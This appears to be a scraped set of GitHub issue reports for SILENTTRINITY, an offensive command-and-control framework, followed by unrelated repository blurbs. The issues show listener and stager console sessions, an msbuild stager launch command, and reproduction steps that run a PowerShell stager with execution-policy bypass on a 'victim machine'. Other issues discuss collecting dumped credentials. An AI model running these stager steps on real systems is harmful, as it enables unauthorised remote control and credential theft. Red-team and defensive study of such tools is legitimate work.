ST (listeners)(http) ≫ set Port 5000
ST (listeners)(http) ≫ start
[+] Listener 'http' started successfully!
ST (listeners)(http) ≫ Running on https://10.0.0.113:5000 (CTRL + C to quit)
ST (listeners)(http) ≫ stagers
ST (stagers) ≫ list
+Available+--------------------------------------+
| Name | Description |
+---------+--------------------------------------+
| wmic | Stage via wmic XSL execution |
+---------+--------------------------------------+
| msbuild | Stage via MSBuild XML inline C# task |
+---------+--------------------------------------+
ST (stagers) ≫ use msbuild
ST (stagers)(msbuild) ≫ options
+-------------+----------+-------+-------------+
| Option Name | Required | Value | Description |
+-------------+----------+-------+-------------+
ST (stagers)(msbuild) ≫ generate http
[+] Generated stager to msbuild.xml
[*] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
ST (stagers)(msbuild) ≫ [2019-01-17 10:08:16,259] ERROR in app: Exception on request GET /stage.zip
Traceback (most recent call last):
File "/usr/local/lib/python3.6/dist-packages/quart/app.py", line 1436, in handle_request
return await self.full_dispatch_request(request_context)
Hello
Is it possible to run with a Public IP?
I tried with some options but I was getting connection issues at staging process.
Thanks
In the description it says that .NET 4.5 is needed to run the stagger and the payloads. The python web server throws a "no shared cipher" error. Is this something odd to do with windows 8.1 embedded ? I am going to throw a Console.WriteLine in the inline c# stagger and see if I can get any other info.
Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.
The generated msbuild.res file works correctly.
The generated msbuild.res file is broken.
A new line char is missing.
Please provide detailed steps for reproducing the issue.
git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
cd SILENTTRINNITY/Server
pipenv install
pipenv shell
stvenom.py msbuild http 8089 --ip 10.10.10.1
Unknown command 'startmodules'
Since we got Pypykatz working with the minidump module now, it would be nice to have a database to store the creds we get instead of just outputting them to the screen. Since I'm gonna want ST to work with CrackMapExec, we might want to make sure the databases are compatible with each other.
Hello,
using ST I'm getting this error:
(SILENTTRINITY) bash-3.2$ python3 teamserver.py IP password
2019-08-11 08:14:41,969 32363 IPCServer - [DEBUG] ipcserver.py: run - Started IPC server on 127.0.0.1:64200
2019-08-11 08:14:42,013 32363 MainThread - [DEBUG] selector_events.py: init - Using selector: KqueueSelector
2019-08-11 08:14:42,184 32363 MainThread - [ERROR] loader.py: get_loadables - Failed loading listener core/teamserver/listeners/dns.py: No module named 'core.thirdparty'
2019-08-11 08:14:42,334 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 4 listener(s)
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: KEY_EXCHANGE -> Sessions.kex
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: ENCRYPT_STAGE -> Sessions.gen_encrypted_stage
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: SESSION_STAGED -> Sessions.notify_session_staged
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: SESSION_CHECKIN -> Sessions.session_checked_in
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: NEW_JOB -> Sessions.add_job
2019-08-11 08:14:42,335 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: JOB_RESULT -> Sessions.job_result
2019-08-11 08:14:42,342 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 12 module(s)
2019-08-11 08:14:42,342 32363 MainThread - [DEBUG] ipcserver.py: attach - Attaching event: GET_STAGERS -> Stagers.get_stagers
2019-08-11 08:14:42,344 32363 MainThread - [DEBUG] loader.py: get_loadables - Loaded 3 stager(s)
2019-08-11 08:14:42,410 32363 MainThread - [WARNING] teamserver.py: server - Teamserver certificate fingerprint: 6e83733b2d06b0b3efe60e9c0bd741b65eb975c0d9f3eee511f4d1a676bc1afc
2019-08-11 08:14:42,411 32363 MainThread - [INFO] teamserver.py: server - Teamserver started on IP:5000
i see this failed:
Failed loading listener core/teamserver/listeners/dns.py: No module named 'core.thirdparty'
using a MacBookPro:
Nome modello: MacBook Pro
Identificatore modello: MacBookPro15,3
Nome processore: Intel Core i9
Velocità processore: 2,9 GHz
Numero di processori: 1
Numero totale di Core: 6
Cache L2 (per Core): 256 KB
Cache L3: 12 MB
Tecnologia Hyper-Threading: Abilitato
Memoria: 32 GB
Versione Boot ROM: 220.270.99.0.0 (iBridge: 16.16.6568.0.0,0)
Versione sistema: macOS 10.14.6 (18G87)
Versione kernel: Darwin 18.7.0
Volume d'avvio: Macintosh HD
Modalità di avvio: Normale
anyone else getting this error ?
Wondering why exactly Python 3.7 is needed. Any thoughts? Thanks.
Hello I believe I have found a bug in recent SILENTTRINITY release.
Context
Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.
SILENTTRINITY Version: Zuiikin 0.4.0dev
OS running the Client: Arch Linux
Python Version Running the Client 3.7.4
OS running the TeamServer: Arch Linux
Python version running the Teamserver: 3.7.4
Expected Behavior
Executing provided .NET assembly from a host machine should give me an output of the said assembly being run on the victim machine.
for eg.
set Assembly /home/user/Downloads/Seatbelt.exe
set Arguments all
run all
Current Behavior
No desired output is returned, instead ST errors with:
[*] [TS-eZ8mR] d7b81c90-e6e4-458c-9505-b5aeb4ec73cb returned job result (id: YE0hRRzQwY)
Error compiling source:
YE0hRRzQwY.boo(11,12): BCE0048: Type 'System.Type' does not support slicing.
YE0hRRzQwY.boo(11,27): BCE0048: Type 'System.Type' does not support slicing.
Failure Information
See the screenshoot for detailed DEBUG information:
Steps to Reproduce
Please provide detailed steps for reproducing the issue.
After installing, pipenv, etc etc... Launch the teamserver python3 teamserver.py 192.168.1.141 pass
Connect client c&c to teamserver python3 st.py wss://username:[email protected]:5000
Set up a listener: listeners, use https, options, start https
Set up a stager: stagers, use powershell, generate https
Copy stager.ps1 to windows victim machine
Execute the stager: powershell -ep bypass .\stager.ps1
Get a session, set up the execute-assembly module and run all.
...
Legacy release works as expected. Please let me know if you need more information and thank you once again for all your time and effort you put into this project.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.